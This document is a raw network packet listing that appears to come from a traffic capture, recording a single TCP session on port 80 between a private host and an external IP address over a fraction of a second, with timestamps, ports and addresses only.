Oct 2, 2024 23:10:13.387115002 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.387118101 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.387131929 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.387135983 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.387160063 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.387181997 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.387712002 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.387726068 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.387739897 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.387753010 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.387753010 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.387763023 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.387768030 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.387782097 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.387785912 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.387793064 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.387795925 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.387803078 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.387809992 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.387820959 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.387824059 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.387846947 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.387864113 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.388307095 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.388320923 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.388334036 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.388346910 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.388359070 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.388361931 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.388375998 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.388381004 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.388391972 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.388401985 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.388406038 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.388421059 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.388422966 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.388430119 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.388437033 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.388443947 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.388457060 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.388470888 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.388470888 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.388519049 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.388531923 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.389278889 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.389300108 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.389313936 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.389328957 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.389328957 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.389339924 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.389343023 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.389358044 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.389358044 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.389372110 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.389372110 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.389389038 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.389390945 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.389403105 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.389410973 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.389425993 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.389436007 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.389440060 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.389453888 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.389467001 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.389482021 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.389488935 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.389488935 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.389494896 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.389502048 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.389530897 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.389548063 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.390105009 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.390157938 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.468739033 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.468779087 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.468792915 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.468801975 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.468823910 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.468830109 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.468903065 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.468916893 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.468930960 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.468943119 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.468959093 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.468976021 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.469053984 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.469069958 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.469105005 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.469111919 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.469121933 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.469136953 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.469149113 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.469161034 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.469163895 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.469172955 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.469181061 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.469189882 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.469207048 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.469216108 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.469525099 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.469540119 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.469552994 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.469578028 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.469588041 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.469666958 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.469715118 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.469716072 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.469731092 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.469755888 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.469765902 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.469917059 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.469932079 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.469966888 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.469976902 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.470086098 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.470099926 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.470113993 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.470128059 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.470134974 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.470141888 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.470144987 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.470166922 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.470172882 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.470196962 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.470208883 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.470499039 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.470511913 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.470525980 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.470540047 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.470549107 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.470562935 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.470587015 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.470784903 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.470798969 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.470813036 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.470833063 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.470843077 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.470843077 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.470856905 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.470870018 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.470873117 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.470896959 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.470911026 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.471100092 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.471149921 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.471182108 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.471196890 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.471210003 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.471224070 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.471232891 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.471237898 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.471251965 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.471251965 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.471278906 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.471291065 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.471610069 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.471625090 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.471638918 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.471664906 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.471687078 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.471832991 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.471883059 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.471954107 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.471968889 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.471981049 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.471993923 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.472003937 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.472007990 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.472023010 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.472028017 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.472037077 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.472050905 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.472054005 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.472065926 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.472081900 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.472095013 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.472115993 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.472464085 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.472477913 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.472517967 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.472625017 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.472640038 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.472652912 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.472666979 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.472668886 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.472681046 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.472693920 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.472695112 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.472708941 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.472723007 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.472723961 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.472735882 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.472742081 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.472749949 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.472764969 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.472790956 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.472790956 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.472803116 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.472867012 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.473568916 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.473582983 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.473596096 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.473609924 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.473620892 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.473623037 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.473637104 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.473645926 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.473651886 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.473658085 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.473666906 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.473679066 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.473689079 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.473692894 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.473706961 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.473716974 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.473721027 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.473736048 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.473746061 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.473767996 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.473787069 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.474359989 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.474374056 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.474387884 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.474401951 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.474411011 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.474416018 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.474430084 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.474433899 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.474443913 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.474457026 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.474471092 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.474472046 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.474483967 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.474492073 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.474515915 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.475070953 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.475097895 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.475112915 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.475121021 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.475127935 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.475133896 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.475142002 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.475148916 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.475156069 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.475167990 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.475167990 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.475171089 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.475184917 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.475195885 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.475204945 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.475215912 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.475218058 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.475231886 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.475234985 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.475239038 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.475249052 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.475260019 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.475263119 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.475279093 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.475298882 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.475316048 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.475960970 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.475975990 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.475989103 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.476002932 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.476003885 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.476016998 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.476027012 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.476027012 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.476031065 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.476043940 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.476047993 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.476053953 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.476058006 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.476073980 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.476077080 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.476083994 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.476104975 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.476119041 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.557177067 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.557193041 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.557207108 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.557312012 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.557377100 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.557391882 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.557404995 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.557476044 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.557476044 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.557476044 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.557476044 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.557476044 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.557657957 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.557672977 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.557686090 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.557701111 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.557816029 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.557830095 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.557845116 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.557945013 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.558134079 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.558574915 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.558588982 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.558602095 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.558628082 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.558639050 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.558660030 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.558675051 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.558687925 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.558701038 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.558702946 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.558711052 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.558715105 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.558729887 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.558741093 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.558767080 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.558954954 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.558969975 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.558983088 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.558995962 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.559001923 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.559009075 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.559021950 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.559022903 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.559036970 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.559043884 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.559051037 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.559051991 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.559067011 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.559077024 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.559078932 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.559098959 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.559122086 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.559122086 CEST	49704	80	192.168.2.5	185.215.113.37
